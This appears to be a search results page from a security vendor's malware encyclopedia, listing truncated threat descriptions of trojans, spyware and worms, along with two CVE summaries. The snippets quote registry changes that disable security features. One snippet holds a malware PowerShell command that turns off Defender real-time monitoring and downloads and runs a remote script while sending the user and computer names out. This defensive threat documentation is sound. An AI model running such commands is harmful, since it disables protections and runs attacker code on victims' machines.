Search
Keyword: unixliona1
\Microsoft\ Windows NT\CurrentVersion\SystemRestore DisableSR = "1" Dropping Routine This Trojan drops the following files: %System Root%\36f8ee1a\36f8ee1a.exe %User Profile%\Application Data\36f8ee1a.exe
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
\ FEATURE_BROWSER_EMULATION iexplore.exe = "22b8" HKEY_CURRENT_USER\Software\51e5db588f 36fb3192 = "{random characters}" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\ Microsoft\Windows\WindowsUpdate DisableOSUpgrade = "1
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
CVE-2010-3654 Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or
CVE-2009-1955 The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote
%\Howard\Howard.exe" 5 %System%\PING.EXE ping 127.0.0.1 "%Program Files%\Howard\Howard.exe" 4 %Program Files%\MachinerData\Howard.exe 1 (Note: %User Temp% is the current user's Temp folder, which is
This Trojan Spy arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded
" HKEY_CURRENT_USER\Software\Microsoft\ RestartManager\Session0000 Sequence = "1" HKEY_CURRENT_USER\Software\Microsoft\ RestartManager\Session0000 RegFiles0000 = "\x00\x00\x00" HKEY_CURRENT_USER\Software\Microsoft
\ClassicStartMenu {871C5380-42A0-1069-A2EA-08002B30309D} = "1" HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Explorer\ HideDesktopIcons\NewStartPanel {871C5380-42A0-1069-A2EA-08002B30309D} = "1
This spyware uses social engineering methods to lure users into performing certain actions that may, directly or indirectly, cause malicious routines to be performed. Specifically, it disguises as a
EnableLUA = "0" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Security Center AntiVirusOverride = "1" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Security Center AntiVirusDisableNotify = "1" HKEY_LOCAL_MACHINE\SOFTWARE
following registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro TELNO = "(855)-332-0124" HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro ISTELNO = "1" HKEY_LOCAL_MACHINE
"Apartment" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ ToolboxBitmap32 (Default) = "%System%\mshtmled.dll, 1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ MiscStatus
Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.tr2q.com/mail.jsp?js*{computer username}*{computer name}*''+[Environment
This spyware may be dropped by other malware. It modifies the affected system's HOSTS files. This prevents users from accessing certain websites. It attempts to steal sensitive online banking
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This backdoor arrives on a system as a